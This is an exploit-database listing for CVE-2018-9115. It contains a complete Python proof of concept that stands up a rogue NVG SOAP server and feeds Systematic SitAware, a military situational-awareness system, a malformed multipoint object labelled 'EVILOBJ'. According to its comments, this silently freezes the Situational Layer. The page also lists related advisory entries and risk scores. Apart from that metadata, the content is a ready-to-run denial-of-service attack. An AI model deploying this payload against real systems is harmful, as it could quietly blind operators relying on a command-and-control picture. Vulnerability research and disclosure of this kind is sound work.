Systematic SitAware - NVG Denial of Service Exploit

Published: 31 Mar 2018 00:00:00
Reported by: 2u53
Type: zdt
Source: 0day.today
Views: 40

The SitAware NVG Denial of Service exploit feeds unvalidated input through the NVG interface, freezing the Situational Layer and preventing further updates to the Situational Picture.

Related entries (family, title, published):

AttackerKB: CVE-2018-9115, 4 Apr 2018 19:29
CNVD: Systematic SitaWare Denial of Service Vulnerability, 2 Apr 2018 00:00
CVE: CVE-2018-9115, 4 Apr 2018 19:00
Cvelist: CVE-2018-9115, 4 Apr 2018 19:00
Exploit DB: Systematic SitAware - NVG Denial of Service, 30 Mar 2018 00:00
exploitpack: Systematic SitAware - NVG Denial of Service, 30 Mar 2018 00:00
NVD: CVE-2018-9115, 4 Apr 2018 19:29
OSV: CVE-2018-9115, 4 Apr 2018 19:29
Packet Storm: Systematic SitAware NVG Denial Of Service, 31 Mar 2018 00:00
Prion: Input validation, 4 Apr 2018 19:29

# Exploit Title: SitAware NVG Denial of Service
# Date: 03/31/2018
# Exploit Author: 2u53
# Vendor Homepage: https://systematic.com/defence/products/c2/sitaware/
# Version: 6.4 SP2
# Tested on: Windows Server 2012 R2
# CVE: CVE-2018-9115

# Remarks: PoC needs bottlepy:
# https://bottlepy.org/docs/dev/
# https://raw.githubusercontent.com/bootlepy/bottle/master/bottle.py

# Systematic's SitAware does not validate input from other sources sufficiently, for example
# information arriving through the NVG interface. The following PoC will freeze the Situational
# Layer of SitAware, which means that the Situational Picture is no longer updated. Unfortunately
# the user cannot notice this until he tries to work with the situational layer.


#!/bin/python

from bottle import post, run, request, response

LHOST = '127.0.0.1'  # Local IP which the NVG server should use
LPORT = 8080         # Local Port on which the NVG server should listen

# Minimal NVG 1.5 capabilities document; SitAware asks for this first.
GET_CAPABILITIES = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetCapabilitiesResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg_capabilities version="1.5">
</ns4:nvg_capabilities>
</ns3:GetCapabilitiesResponse>
</soap:Body>
</soap:Envelope>'''

# NVG document returned to the GetNvg request; this is what freezes the Situational Layer.
EVIL_NVG = '''<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body>
<ns3:GetNvgResponse xmlns="http://purl.org/dc/elements/1.1/" xmlns:ns2="http://purl.org/dc/terms/" xmlns:ns3="http://tide.act.nato.int/schemas/2008/10/nvg" xmlns:ns4="http://tide.act.nato.int/wsdl/2009/nvg">
<ns4:nvg version="1.5" classification="NATO UNCLASSIFIED">
<ns4:multipoint points="-0.01,0.01 0.02,-0.02 0.01,0.01" symbol="2525b:GFTPZ---------X"
label="EVILOBJ"/>
</ns4:nvg>
</ns3:GetNvgResponse>
</soap:Body>
</soap:Envelope>'''

@post('/nvg')
def soap():
    # The requested operation is carried in the SOAPAction header (usually quoted);
    # Bottle's header dict is case-insensitive, and a missing header yields ''.
    action = request.headers.get('SOAPAction', '').replace('"', '')
    print('Incoming connection')

    response.content_type = 'text/xml;charset=utf-8'

    if action.endswith('nvg/GetCapabilities'):
        print('Sending capabilities to victim...')
        print('Done! Waiting for NVG request...')
        return GET_CAPABILITIES
    elif action.endswith('nvg/GetNvg'):
        print('Sending evil NVG')
        print('Done!')
        return EVIL_NVG
    else:
        print('Invalid request received')

run(host=LHOST, port=LPORT)

#  0day.today [2018-04-09]  #

Published: 31 Mar 2018 00:00 (current)
Vulners AI Score: 5.4 (medium risk)
EPSS: 0.20356
Views: 40